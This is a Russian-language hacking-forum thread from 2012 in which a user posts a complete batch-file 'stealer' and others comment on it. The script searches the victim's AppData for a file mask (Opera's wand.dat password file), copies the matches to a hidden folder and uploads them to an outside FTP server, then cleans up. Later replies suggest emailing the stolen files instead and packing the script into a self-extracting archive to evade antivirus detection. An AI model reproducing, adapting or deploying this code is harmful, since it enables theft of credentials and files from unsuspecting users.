ANTICHAT
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Стилер файлов на batch (https://forum.antichat.xyz/showthread.php?t=328163)

j0sur 10.04.2012 20:56
Последнее время появилось много "приватных" стилеров, которые способны тянуть файлы с компа жертвы по маске и заливать их на ftp. Стоят такие двух-трех мегабайтные "монстры" на Делфи около $40. Неудевительно, ведь они не палятся

И вот я решил написать своего такого зверя, но не для того, что бы продавать, а показать, насколько это элементарно.

И так вот говнокодец на батче:

Код:
@echo off
prompt $$$g
::настройки
set ans=%temp%\ans
::файл ответов
set login=login
set pwd=pass
::логин-пасс
set dir=%date%_%time%
set ld=%systemdrive%\files
::директории
set pth=%appdata%
set mask=wand.dat
::маска для поиска

echo open ftp.nextmail.ru > %ans%
echo user %login%>> %ans%
echo %pwd%>> %ans%
::логинимя на ftp
echo mkdir %dir% >> %ans%
echo cd %dir% >> %ans%
echo binary >> %ans%
::готовимся передавать файлы

mkdir %ld%
attrib +h %ld%
::виндовый ftp не умеет работать с путями с русскими символами

::forfiles /p %pth% /s /m %mask% /c "cmd /c copy @path %ld%"
for /r "%pth%" %%d in (%mask%) do copy %%d %ld%>nul
::forfiles /p %ld% /s /m * /c "cmd /c echo put @path >> %ans%"
for /r %ld% %%d in (*) do echo put %%d >> %ans%

echo quit >> %ans%

ftp -v -n -s:%ans%
del /q /f %ans%
::del /q /f %0
rmdir /s /q %ld%
pause
Так что, все очень элементарно и просто, да и коментов полно.

Елинственное, замечу, что forfiles, наверно, более элегантен, чем for, но появился только в 2003, так что не так универсален. Что использовать, решать Вам .

А я прошу коментировать мою статью, уточнять и дополнять ее. Спасибо за внимание.

Twittix 15.04.2012 15:42
Минус в том что Защитник windows будет писать что обнаружен консольный FTP и предложить удалить его.

Лучше использовать консольный e-mail

D4rkC10ud 05.08.2012 06:27
+ Автор молодец - материал забавен

- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества

А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.

j0sur 05.08.2012 11:09
Цитата:
Сообщение от D4rkC10ud
+ Автор молодец - материал забавен
- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества
А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.
Батч просто очень хорошо подходит для манипуляций с файлами, не больше, не меньше. С WSH знаком хорошо, MonadShell нужно заведомо поставить на комп жертвы, а значит он не подходит.

altblitz 05.08.2012 12:17
j0sur,

юзал Pinch?

там всё - кодер The Bat (той самой мейл проги) написал, на Си.

сурсы проги есть.

j0sur 05.08.2012 13:35
Цитата:
Сообщение от altblitz
j0sur
,
юзал Pinch?
там всё - кодер The Bat (той самой мейл проги) написал, на Си.
сурсы проги есть.
Есть люди, которые любят использовать свои велосипеды

DooD 05.08.2012 14:21
Вставлю и я свои 5 копеек.

1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.

2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.

По этому все это пишется на нормальных ЯП и стоит соответственно.

shadowrun 05.08.2012 14:51
Цитата:
Сообщение от j0sur
двух-трех мегабайтные "монстры" на Делфи
Стиллер? 2-3 Мб? Руки = false...

j0sur 05.08.2012 14:56
Цитата:
Сообщение от DooD
Вставлю и я свои 5 копеек.
1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.
2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.
По этому все это пишется на нормальных ЯП и стоит соответственно.
1) можно(просто весьма муторно), на vbs все это реализуется в 5-10 кб(на харде валяется такой, правда ищет в списке папок, но вместо него генерить список дисков -- 15-20 строк)

2) sfx можно собрать, 100% палится не будет, но и размер порядка 150-200 кб будет, хотя если лепить с чем-то больше 1мб, то врядли кто-то заметит.

В целом, (недо)статья писалась что бы показать насколько это элементарно.

Цитата:
Сообщение от shadowrun
Стиллер? 2-3 Мб? Руки = false...
Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.

shadowrun 05.08.2012 15:06
Цитата:
Сообщение от j0sur
Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.
Тогда давай не будем вводить пользователей в заблуждение. 2 года назад писал подобное. Быдлокодом + использовал инди и результат вышел около 250 кб. А если юзать сокеты и винапи?


Время: 02:10
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице